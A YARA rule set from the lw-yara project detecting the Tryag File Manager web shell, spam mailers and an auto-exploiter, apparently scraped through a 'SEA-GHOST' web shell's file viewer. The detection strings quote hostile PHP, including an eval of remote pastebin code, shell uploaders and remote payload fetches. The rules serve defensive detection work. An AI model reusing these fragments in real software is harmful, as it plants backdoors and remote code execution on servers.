[ SEA-GHOST MINI SHELL]

Path : /usr/local/scan/lw-yara/includes/
FILE UPLOADER :
Current File : //usr/local/scan/lw-yara/includes/Tryag-File-Manager-1.yar

/*
   Yara Rule Set
   Author: Brian Laskowski
   Date: 2018-07-14
   Identifier: Tryag-File-Manager-jpeg-master
   Reference: https://github.com/Hestat/lw-yara
*/

/* Rule Set ----------------------------------------------------------------- */

rule Tryag_File_Manager_jpeg_master_0up {
   meta:
      description = "Tryag-File-Manager-jpeg-master - file 0up.php"
      author = "Brian Laskowski"
      reference = "https://github.com/Hestat/lw-yara"
      date = "2018-07-14"
      hash1 = "083c429dc1ffeabbd474429b573c40d6f395b1765409fbb9e63c98f05c1fb80d"
   strings:
      $s1 = "<form action=\"\" method=\"post\" enctype=\"multipart/form-data\" name=\"uploader\" id=\"uploader\">';" fullword ascii
      //$s2 = "if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) { echo '<b>Shell Uploaded ! :)<b><br><br>'; }" fullword ascii
      //$s3 = "<script type=\"text/javascript\" src=\"http://www.codejquery.net/jquery.mins.js\" ></script>" fullword ascii
      //$s4 = "if( $_POST['_upl'] == \"Upload\" ) {" fullword ascii
      //$s5 = "else { echo '<b>Not uploaded ! </b><br><br>'; }" fullword ascii
   condition:
      ( uint16(0) == 0x743c and
         filesize < 1KB and
         ( all of them )
      ) or ( all of them )
}


rule _media_brian_88D1_7DB91_infected_07_14_18_Tryag_File_Manager_jpeg_master_up {
   meta:
      description = "Tryag-File-Manager-jpeg-master - file up.php"
      author = "Brian Laskowski"
      reference = "https://github.com/Hestat/lw-yara"
      date = "2018-07-14"
      hash1 = "5bdaa9018e5892715d584d359f2d7eafd528137ec1ac403aafd56662e4bece05"
   strings:
      $s1 = "<form action=\"\" method=\"post\" enctype=\"multipart/form-data\" name=\"uploader\" id=\"uploader\">';" fullword ascii
      $s2 = "if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) { echo '<b>Shell Uploaded ! :)<b><br><br>'; }" fullword ascii
      $s3 = "<script type=\"text/javascript\" src=\"http://www.codejquery.net/jquery.mins.js\" ></script>" fullword ascii
      $s4 = "if( $_POST['_upl'] == \"Upload\" ) {" fullword ascii
      $s5 = "else { echo '<b>Not uploaded ! </b><br><br>'; }" fullword ascii
   condition:
      ( uint16(0) == 0x743c and
         filesize < 1KB and
         ( all of them )
      ) or ( all of them )
}

rule alexusMailer_v2_0 {
   meta:
      description = "Tryag-File-Manager-jpeg-master - file alexusMailer_v2.0.php"
      author = "Brian Laskowski"
      reference = "https://github.com/Hestat/lw-yara"
      date = "2018-07-14"
      hash1 = "82572013074747e079cde069ab95af8b20b597aaf76eeb892dc383a58be24620"
   strings:
      $x1 = "</span><br>\"),$(\"#out_servers\").val($(\"#out_servers\").val()+b.server+\"\\n\")):$(\"#pingout_log\").html(c+\"<span style='co" ascii
      $x2 = "}b.merge(d,s.childNodes),s.textContent=\"\";while(s.firstChild)s.removeChild(s.firstChild);s=f.lastChild}else d.push(t.createTex" ascii
      $x3 = "*/(function(n){function vi(t){var i=this,e=t.target,y=n.data(e,a),p=s[y],w=p.popupName,k=f[w],v,b;if(!i.disabled&&n(e).attr(r)!=" ascii
      $x4 = "if(\"undefined\"==typeof jQuery)throw new Error(\"Bootstrap's JavaScript requires jQuery\");+function(a){\"use strict\";function" ascii
      $x5 = "return(!i||i!==r&&!b.contains(r,i))&&(e.type=o.origType,n=o.handler.apply(this,arguments),e.type=t),n}}}),b.support.submitBubble" ascii
      $x6 = "!function(a,b){\"use strict\";\"function\"==typeof define&&define.amd?define([\"jquery\"],b):\"object\"==typeof exports?module.e" ascii
      $x7 = "(function(e,t){var n,r,i=typeof t,o=e.document,a=e.location,s=e.jQuery,u=e.$,l={},c=[],p=\"1.9.1\",f=c.concat,d=c.push,h=c.slice" ascii
      $x8 = "body{background-color:#fff}.content{margin:0 auto;background-color:#fcf2d4;width:1000px;padding:5px;border:1px solid #000;border" ascii
      $x9 = ": http://serv4.ru/sw.php|c99|login:password<?php endif;?>\"  <?php if(SERVICEMODE):?>readonly<?php endif;?>></textarea><br>" fullword ascii
      $x10 = "\"error\"=>$translation->getWord(\"shell-sheck-test-command-execution-failed\")" fullword ascii
      $x11 = "'shell-sheck-test-command-execution-failed'=>'Test command execution failed'," fullword ascii
      $x12 = "On the Configuration tab of external servers is available quick check of shells, it checks that the addresses are correct, passw" ascii
      $x13 = "ach(function(){d.offsets.push(this[0]),d.targets.push(this[1])})},b.prototype.process=function(){var a,b=this.$scrollElement.scr" ascii
      $s14 = "\"echo file_get_contents(\\'http://google.com/humans.txt\\');\" " fullword ascii
      $s15 = "* Bootstrap v3.2.0 (http://getbootstrap.com)" fullword ascii
      $s16 = "'shell-sheck-test-command-execution-failed'=>'" fullword ascii
      $s17 = "* Licensed under MIT (https://github.com/twbs/bootstrap/blob/master/LICENSE)" fullword ascii
      $s18 = "return $shellManager->exec($type, $url, $code, $data, $pass, isset($login)?$login:null);" fullword ascii
      $s19 = "$answer=$shellManager->exec($type, $url, $testcode, $data, $pass, isset($login)?$login:null);" fullword ascii
      $s20 = "command. Try using the keyboard shortcut or context menu instead.\",f):ut(n,l?l:\"Error executing the \"+i+\" command.\",f))}ret" ascii
   condition:
      ( uint16(0) == 0x3f3c and
         filesize < 2000KB and
         ( 1 of ($x*) and all of them )
      ) or ( all of them )
}


rule TryagFileManager3 {
   meta:
      description = "Tryag-File-Manager-jpeg-master - file TryagFileManager3.php"
      author = "Brian Laskowski"
      reference = "https://github.com/Hestat/lw-yara"
      date = "2018-07-14"
      hash1 = "3cf5af7774d1dc7ca7b58d9d6899ef307eabb9ed9b66d4ef0eb44cd346135bd8"
   strings:
      $s1 = "<textarea cols=80 rows=20 name=\"src\">'.htmlspecialchars(file_get_contents($_POST['path'])).'</textarea><br />" fullword ascii
      $s2 = "echo('<pre>'.htmlspecialchars(file_get_contents(base64_decode($_GET['filesrc']))).'</pre>');" fullword ascii
      $s3 = "echo '<br />Tryag File Manager Version <font color=\"red\">1.1</font>, Coded By <font color=\"red\">./ChmoD</font><br />Home: <f" ascii
      $s4 = "<script type=\"text/javascript\" src=\"http://www.codejquery.net/jquery.mins.js\" ></script>" fullword ascii
      $s5 = "echo '<div id=\"content\"><table width=\"700\" border=\"0\" cellpadding=\"3\" cellspacing=\"1\" align=\"center\">" fullword ascii
      $s6 = "echo '<br />Tryag File Manager Version <font color=\"red\">1.1</font>, Coded By <font color=\"red\">./ChmoD</font><br />Home: <f" ascii
      $s7 = "New Name : <input name=\"newname\" type=\"text\" size=\"20\" value=\"'.$_POST['name'].'\" />" fullword ascii
      $s8 = "echo '<font color=\"red\">File Upload Error.</font><br />';" fullword ascii
      $s9 = "<td><center><form method=\\\"POST\\\" action=\\\"?option&path=$pathen\\\">" fullword ascii
      $s10 = "$url=$_SERVER['HTTP_HOST'].$_SERVER['REQUEST_URI'];" fullword ascii
      $s11 = "if(is_writable(\"$path/$file\") || !is_readable(\"$path/$file\")) echo '</font>';" fullword ascii
      $s12 = "echo '<font color=\"green\">File Upload Done.</font><br />';" fullword ascii
      $s13 = "<input type=\"hidden\" name=\"path\" value=\"'.$_POST['path'].'\">" fullword ascii
      $s14 = "foreach($_POST as $key=>$value){" fullword ascii
      $s15 = "$_POST[$key] = stripslashes($value);" fullword ascii
      $s16 = "if(is_writable(\"$path/$dir\") || !is_readable(\"$path/$dir\")) echo '</font>';" fullword ascii
      $s17 = "}elseif(isset($_GET['option']) && $_POST['opt'] != 'delete'){" fullword ascii
      $s18 = "if(isset($_GET['option']) && $_POST['opt'] == 'delete'){" fullword ascii
      $s19 = "echo '<form enctype=\"multipart/form-data\" method=\"POST\">" fullword ascii
      $s20 = "if(copy($_FILES['file']['tmp_name'],$path.'/'.$_FILES['file']['name'])){" fullword ascii
   condition:
      ( uint16(0) == 0x3f3c and
         filesize < 30KB and
         ( 8 of them )
      ) or ( all of them )
}

rule leafmailer {
   meta:
      description = "Tryag-File-Manager-jpeg-master - file leafmailer.php"
      author = "Brian Laskowski"
      reference = "https://github.com/Hestat/lw-yara"
      date = "2018-07-14"
      hash1 = "26b6e96b0103e547b08cabb2b0ef1f14acab5b154ffc69a1afc85c8dc47ae029"
   strings:
      $x1 = "print \"<pre align=center><form method=post>Password: <input type='password' name='pass'><input type='submit' value='>>'>" fullword ascii
      $s2 = "<script src=\"https://maxcdn.bootstrapcdn.com/bootstrap/3.3.6/js/bootstrap.min.js\"></script>" fullword ascii
      $s3 = "<link href=\"https://maxcdn.bootstrapcdn.com/bootswatch/3.3.6/cosmo/bootstrap.min.css\" rel=\"stylesheet\" >" fullword ascii
      $s4 = "* Options are LOGIN (default), PLAIN, NTLM, CRAM-MD5" fullword ascii
      $s5 = "$sendmail = sprintf('%s -oi -f%s -t', escapeshellcmd($this->Sendmail), escapeshellarg($this->Sender));" fullword ascii
      $s6 = "$sendmail = sprintf('%s -f%s', escapeshellcmd($this->Sendmail), escapeshellarg($this->Sender));" fullword ascii
      $s7 = "$privKeyStr = file_get_contents($this->DKIM_private);" fullword ascii
      $s8 = "<script type=\"text/javascript\" src=\"http://www.codejquery.net/jquery.mins.js\" ></script>" fullword ascii
      $s9 = "<li>hello <b>[-emailuser-]</b> -> hello <b>user</b></li>" fullword ascii
      $s10 = "$sendmail = sprintf('%s -oi -t', escapeshellcmd($this->Sendmail));" fullword ascii
      $s11 = "Reciver Email = <b>user@domain.com</b><br>" fullword ascii
      $s12 = "$DKIMb64 = base64_encode(pack('H*', sha1($body))); // Base64 of packed binary SHA-1 hash of body" fullword ascii
      $s13 = "* and creates a plain-text version by converting the HTML." fullword ascii
      $s14 = "* Usually the email address used as the source of the email" fullword ascii
      $s15 = "<li>your code is  <b>[-randommd5-]</b> -> your code is <b>e10adc3949ba59abbe56e057f20f883e</b></li>" fullword ascii
      $s16 = "print \"<pre align=center><form method=post>Password: <input type='password' name='pass'><input type='submit' value='>>'></form>" ascii
      $s17 = "* PHPMailer only supports some preset message types," fullword ascii
      $s18 = "* @param string $patternselect A selector for the validation pattern to use :" fullword ascii
      $s19 = "<meta http-equiv=\"Content-Type\" content=\"text/html; charset=utf-8\"/>" fullword ascii
      $s20 = "if (isset($_REQUEST['pass']) and $_REQUEST['pass'] == $password) {" fullword ascii
   condition:
      ( uint16(0) == 0x3f3c and
         filesize < 400KB and
         ( 1 of ($x*) and 4 of them )
      ) or ( all of them )
}

rule _media_brian_88D1_7DB91_infected_07_14_18_Tryag_File_Manager_jpeg_master_x7 {
   meta:
      description = "Tryag-File-Manager-jpeg-master - file x7.php"
      author = "Brian Laskowski"
      reference = "https://github.com/Hestat/lw-yara"
      date = "2018-07-14"
      hash1 = "6f6af1bc060e8030567dd30b1ec669872b0c4cb4bea3cd333949f6f4a2135acd"
   strings:
      $x1 = "<?php eval(\"?>\".file_get_contents(\"https://pastebin.com/raw/jAqZ3cxT\"));" fullword ascii
   condition:
      ( uint16(0) == 0x3f3c and
         filesize < 1KB and
         ( 1 of ($x*) )
      ) or ( all of them )
}

rule OsComPayLoad {
   meta:
      description = "Tryag-File-Manager-jpeg-master - file OsComPayLoad.php"
      author = "Brian Laskowski"
      reference = "https://github.com/Hestat/lw-yara"
      date = "2018-07-14"
      hash1 = "0827d167971390bc8c718aed98308af04a8276e8ab7839fc51f2b4713a2ee001"
   strings:
      $x1 = "$text2 = http_get('https://raw.githubusercontent.com/04x/ICG-AutoExploiterBoT/master/files/vuln.txt');" fullword ascii
      $x2 = "$text = http_get('https://raw.githubusercontent.com/Theanvenger/Tryag-File-Manager-jpeg/master/0up.php');" fullword ascii
      $s3 = "$check = $_SERVER['DOCUMENT_ROOT'] . \"/wp-content/vuln.php\" ;" fullword ascii
      $s4 = "$check2 = $_SERVER['DOCUMENT_ROOT'] . \"/vuln.htm\" ;" fullword ascii
      $s5 = "function http_get($url){" fullword ascii
      $s6 = "return curl_exec($im);" fullword ascii
      $s7 = "curl_setopt($im, CURLOPT_HEADER, 0);" fullword ascii
   condition:
      ( uint16(0) == 0x743c and
         filesize < 2KB and
         ( 1 of ($x*) and all of them )
      ) or ( all of them )
}

rule RUSSIAN_MAILER2018 {
   meta:
      description = "Tryag-File-Manager-jpeg-master - file RUSSIAN-MAILER2018.php"
      author = "Brian Laskowski"
      reference = "https://github.com/Hestat/lw-yara"
      date = "2018-07-14"
      hash1 = "fc90f92c91ca7b149c9e268053e23e816e49e4613dcf9f09c318882cde8c5ecb"
   strings:
      $s1 = "$message = stripslashes($message);" fullword ascii
      $s2 = "$driv3r = $email[$i];" fullword ascii
      //$s3 = "$subject = $_POST['ssubject'];" fullword ascii
      //$s4 = "$testa = $_POST['veio'];" fullword ascii
      condition:
       all of them
}

rule mail_2018 {
   meta:
      description = "Tryag-File-Manager-jpeg-master - file mail-2018.php"
      author = "Brian Laskowski"
      reference = "https://github.com/Hestat/lw-yara"
      date = "2018-07-14"
      hash1 = "35d176c910d8db75fb752620eec215aa618ba00a74b563d85db5bcd72fc0d710"
   strings:
      //$s1 = "$headers .= \"Content-Transfer-Encoding: \". encodeCTE($XXX['MessgaeEnc']).\"\\n\";" fullword ascii
      //$s2 = "<script type=\"text/javascript\" src=\"http://www.codejquery.net/jquery.mins.js\" ></script>" fullword ascii
      $s3 = "//contact: https://www.facebook.com/achraf.orion.1//" fullword ascii
      //$s4 = "$headers .= \"Content-Type: text/html; charset=UTF-8\\n\";" fullword ascii
      //$s5 = "echo\"<br>*** (Sleep Mode <font color=green> On</font>) Sleeping <font color=red>$sleep seconds</font>... Done ***\";" fullword ascii
      //$s6 = "echo \"<br>$n - Sending... => $taz => <b> <font color=red> Error</font></b>\";" fullword ascii
      //$s7 = "var el = document.getElementById(\"hdlog\");" fullword ascii
      //$s8 = "<a class=\"navbar-brand\" href=\"http://<?= $_SERVER['HTTP_HOST'].$_SERVER['PHP_SELF']?>\">" fullword ascii
      //$s9 = "<meta name=\"viewport\" content=\"width=device-width, initial-scale=1, shrink-to-fit=no\">" fullword ascii
      //$s10 = "<input class=\"form-control input\" name=\"subject\"  placeholder=\"Subject\" required=\"\" type=\"text\" autocomplete=\"off\">" fullword ascii
      //$s11 = "<input class=\"form-control input\" name=\"subject\"  placeholder=\"Subject\" required=\"\" type=\"text\" autocomplete=\"" fullword ascii
      //$s12 = "str.length > 0 ? el.innerHTML += str.shift() : clearTimeout(running); " fullword ascii
      //$s13 = "<input class=\"form-control input\" name=\"email\" placeholder=\"Email\" required=\"\"\" type=\"text\" autocomplete=\"off\">" fullword ascii
      //$s14 = "<input class=\"form-control input\" name=\"email\" placeholder=\"Email\" required=\"\"\" type=\"text\" autocomplete=\"off\"" fullword ascii
      //$s15 = "<link rel=\"stylesheet\" href=\"https://maxcdn.bootstrapcdn.com/bootstrap/4.0.0-alpha.6/css/bootstrap.min.css\" integrity=\"sha3" ascii
      //$s16 = "<input class=\"form-control input\" name=\"name\" placeholder=\"Name\" type=\"text\" autocomplete=\"off\">" fullword ascii
      $s17 = ".log{" fullword ascii
      //$s18 = "$headers .= \"MIME-Version: 1.0\\n\";" fullword ascii
      //$s19 = "$headers .= \"X-Priority: \".$XXX['Priority'].\"\\n\";" fullword ascii
      $s20 = "if (mail($taz, $subj, $mess, $headers)){" fullword ascii
   condition:
      ( uint16(0) == 0x3f3c and
         filesize < 40KB and
         ( 8 of them )
      ) or ( all of them )
}

rule shell_php {
   meta:
      description = "Tryag-File-Manager-jpeg-master - file shell.php.pjpeg"
      author = "Brian Laskowski"
      reference = "https://github.com/Hestat/lw-yara"
      date = "2018-07-14"
      hash1 = "cb2241fd794aaff55b354114d1447e3e6411619ca257316807cb6d0d59651021"
   strings:
      $s1 = "echo '<br />Coded by -_- janina</font>" fullword ascii
      $s2 = "<textarea cols=80 rows=20 name=\"src\">'.htmlspecialchars(file_get_contents($_POST['path'])).'</textarea><br />" fullword ascii
      $s3 = "<script type=\"text/javascript\" src=\"http://www.codejquery.net/jquery.mins.js\" ></script>" fullword ascii
      $s4 = "echo('<pre>'.htmlspecialchars(file_get_contents($_GET['filesrc'])).'</pre>');" fullword ascii
      $s5 = "echo '<div id=\"content\"><table width=\"700\" border=\"0\" cellpadding=\"3\" cellspacing=\"1\" align=\"center\">" fullword ascii
      $s6 = "New Name : <input name=\"newname\" type=\"text\" size=\"20\" value=\"'.$_POST['name'].'\" />" fullword ascii
      $s7 = "echo '<font color=\"red\">File Upload Error.</font><br />';" fullword ascii
      $s8 = "<td><center><form method=\\\"POST\\\" action=\\\"?option&path=$path\\\">" fullword ascii
      $s9 = "if(is_writable(\"$path/$file\") || !is_readable(\"$path/$file\")) echo '</font>';" fullword ascii
      $s10 = "echo '<font color=\"green\">File Upload Done.</font><br />';" fullword ascii
      $s11 = "<input type=\"hidden\" name=\"path\" value=\"'.$_POST['path'].'\">" fullword ascii
      $s12 = "foreach($_POST as $key=>$value){" fullword ascii
      $s13 = "$_POST[$key] = stripslashes($value);" fullword ascii
      $s14 = "if(is_writable(\"$path/$dir\") || !is_readable(\"$path/$dir\")) echo '</font>';" fullword ascii
      $s15 = "}elseif(isset($_GET['option']) && $_POST['opt'] != 'delete'){" fullword ascii
      $s16 = "if(isset($_GET['option']) && $_POST['opt'] == 'delete'){" fullword ascii
      $s17 = "echo '<form enctype=\"multipart/form-data\" method=\"POST\">" fullword ascii
      $s18 = "if(copy($_FILES['file']['tmp_name'],$path.'/'.$_FILES['file']['name'])){" fullword ascii
      $s19 = "echo '</table><br /><center>'.$_POST['path'].'<br /><br />';" fullword ascii
      $s20 = "echo '<font color=\"red\">Change Permission Error.</font><br />';" fullword ascii
   condition:
      ( uint16(0) == 0x3f3c and
         filesize < 30KB and
         ( 8 of them )
      ) or ( all of them )
}

/* Super Rules ------------------------------------------------------------- */

rule _TryagFileManager_TryagFileManager3_shell_php_0 {
   meta:
      description = "Tryag-File-Manager-jpeg-master - from files TryagFileManager.php, TryagFileManager3.php, shell.php.pjpeg"
      author = "Brian Laskowski"
      reference = "https://github.com/Hestat/lw-yara"
      date = "2018-07-14"
      hash1 = "e32a7a80127f4d5be15a811c9f52b0698f2b73e5d65d48808462b074b9131856"
      hash2 = "3cf5af7774d1dc7ca7b58d9d6899ef307eabb9ed9b66d4ef0eb44cd346135bd8"
      hash3 = "cb2241fd794aaff55b354114d1447e3e6411619ca257316807cb6d0d59651021"
   strings:
      $s1 = "New Name : <input name=\"newname\" type=\"text\" size=\"20\" value=\"'.$_POST['name'].'\" />" fullword ascii
      $s2 = "echo '<font color=\"red\">File Upload Error.</font><br />';" fullword ascii
      $s3 = "echo '<font color=\"green\">File Upload Done.</font><br />';" fullword ascii
      $s4 = "foreach($_POST as $key=>$value){" fullword ascii
      $s5 = "$_POST[$key] = stripslashes($value);" fullword ascii
      $s6 = "echo '<font color=\"red\">Change Permission Error.</font><br />';" fullword ascii
      $s7 = "echo '<font color=\"red\">Delete File Error.</font><br />';" fullword ascii
      $s8 = "echo '<font color=\"red\">Edit File Error.</font><br />';" fullword ascii
      $s9 = "echo '<font color=\"red\">Change Name Error.</font><br />';" fullword ascii
      $s10 = "echo '<font color=\"red\">Delete Dir Error.</font><br />';" fullword ascii
      $s11 = "}elseif($_POST['opt'] == 'rename'){" fullword ascii
      $s12 = "$_POST['name'] = $_POST['newname'];" fullword ascii
      $s13 = "}elseif($_POST['type'] == 'file'){" fullword ascii
      $s14 = "$fp = fopen($_POST['path'],'w');" fullword ascii
      $s15 = "if($_POST['opt'] == 'chmod'){" fullword ascii
      $s16 = "echo '<form method=\"POST\">" fullword ascii
      $s17 = "if(rmdir($_POST['path'])){" fullword ascii
      $s18 = "if(unlink($_POST['path'])){" fullword ascii
      $s19 = "echo '<font color=\"green\">Change Permission Done.</font><br />';" fullword ascii
      $s20 = "Upload File : <input type=\"file\" name=\"file\" />" fullword ascii
   condition:
      ( uint16(0) == 0x3f3c and
        filesize < 80KB and ( 8 of them )
      ) or ( all of them )
}

rule _TryagFileManager3_shell_php_1 {
   meta:
      description = "Tryag-File-Manager-jpeg-master - from files TryagFileManager3.php, shell.php.pjpeg"
      author = "Brian Laskowski"
      reference = "https://github.com/Hestat/lw-yara"
      date = "2018-07-14"
      hash1 = "3cf5af7774d1dc7ca7b58d9d6899ef307eabb9ed9b66d4ef0eb44cd346135bd8"
      hash2 = "cb2241fd794aaff55b354114d1447e3e6411619ca257316807cb6d0d59651021"
   strings:
      //$s1 = "<textarea cols=80 rows=20 name=\"src\">'.htmlspecialchars(file_get_contents($_POST['path'])).'</textarea><br />" fullword ascii
      $s2 = "echo '<div id=\"content\"><table width=\"700\" border=\"0\" cellpadding=\"3\" cellspacing=\"1\" align=\"center\">" fullword ascii
      $s3 = "if(is_writable(\"$path/$file\") || !is_readable(\"$path/$file\")) echo '</font>';" fullword ascii
      //$s4 = "<input type=\"hidden\" name=\"path\" value=\"'.$_POST['path'].'\">" fullword ascii
      //$s5 = "if(is_writable(\"$path/$dir\") || !is_readable(\"$path/$dir\")) echo '</font>';" fullword ascii
      //$s6 = "}elseif(isset($_GET['option']) && $_POST['opt'] != 'delete'){" fullword ascii
      //$s7 = "if(isset($_GET['option']) && $_POST['opt'] == 'delete'){" fullword ascii
      //$s8 = "echo '<form enctype=\"multipart/form-data\" method=\"POST\">" fullword ascii
      //$s9 = "if(copy($_FILES['file']['tmp_name'],$path.'/'.$_FILES['file']['name'])){" fullword ascii
      //$s10 = "echo '</table><br /><center>'.$_POST['path'].'<br /><br />';" fullword ascii
      //$s11 = "elseif(!is_readable(\"$path/$dir\")) echo '<font color=\"red\">';" fullword ascii
      //$s12 = "elseif(!is_readable(\"$path/$file\")) echo '<font color=\"red\">';" fullword ascii
      //$s13 = "if(rename($_POST['path'],$path.'/'.$_POST['newname'])){" fullword ascii
      //$s14 = "if(chmod($_POST['path'],$_POST['perm'])){" fullword ascii
      //$s15 = "<table width=\"700\" border=\"0\" cellpadding=\"3\" cellspacing=\"1\" align=\"center\">" fullword ascii
      //$s16 = "}elseif($_POST['opt'] == 'edit'){" fullword ascii
      //$s17 = "Permission : <input name=\"perm\" type=\"text\" size=\"4\" value=\"'.substr(sprintf('%o', fileperms($_POST['path'])), -4).'\" />" ascii
      //$s18 = "if(isset($_GET['path'])){" fullword ascii
      //$s19 = "if(fwrite($fp,$_POST['src'])){" fullword ascii
      //$s20 = "<input type=\\\"hidden\\\" name=\\\"type\\\" value=\\\"file\\\">" fullword ascii
   condition:
      ( uint16(0) == 0x3f3c and
        filesize < 30KB and ( 8 of them )
      ) or ( all of them )
}


SEA-GHOST - SHELL CODING BY SEA-GHOST